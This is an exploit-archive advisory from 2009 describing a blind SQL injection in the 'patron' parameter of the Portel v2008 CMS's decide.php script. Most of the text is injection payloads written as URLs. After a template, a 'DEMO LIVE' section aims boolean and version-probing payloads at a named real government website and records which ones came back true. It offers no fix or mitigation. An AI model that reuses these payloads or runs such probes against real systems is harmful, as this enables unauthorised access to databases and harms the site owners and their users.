[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Portel v2008 (decide.php patron) Blind SQL Injection Vulnerability
# Published : 2009-08-05
# Author : Chip D3 Bi0s
# Previous Title : OpenNews 1.0 (SQLI/RCE) Multiple Remote Vulnerabilities
# Next Title : MOC Designs PHP News 1.1 (Auth Bypass) SQL Injection Vulnerability
------------------------------------------------------------------------------
Portel (patron) Blind SQL-injection Vulnerability
------------------------------------------------------------------------------
#####################################################
# [+] Author : Chip D3 Bi0s #
# [+] Email : chipdebios[alt+64]gmail.com #
# [+] Vulnerability : Blind SQL injection #
# [+] Group : LatinHackTeam #
#####################################################
**********************************************************************
Info Cms:
* Name : Portel
* Web : http://www.porteleditor.com
* dowloand : http://www.porteleditor.com/instalacion/portelv2008.zip
http://rapidshare.com/files/263383411/portelv2008.zip.html
* Country : Colombia
**********************************************************************
Example:
http://localHost/path/libreria/php/decide.php?patron=n<Blind Sql Code>
n = patron valid
DEMO LIVE:
http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+1=1/*
true
http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+1=2/*
else
http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+substring(@@version,1,1)=4/*
else
http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+substring(@@version,1,1)=5/*
true
etc, etc....
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
# www.Syue.com [2009-08-05]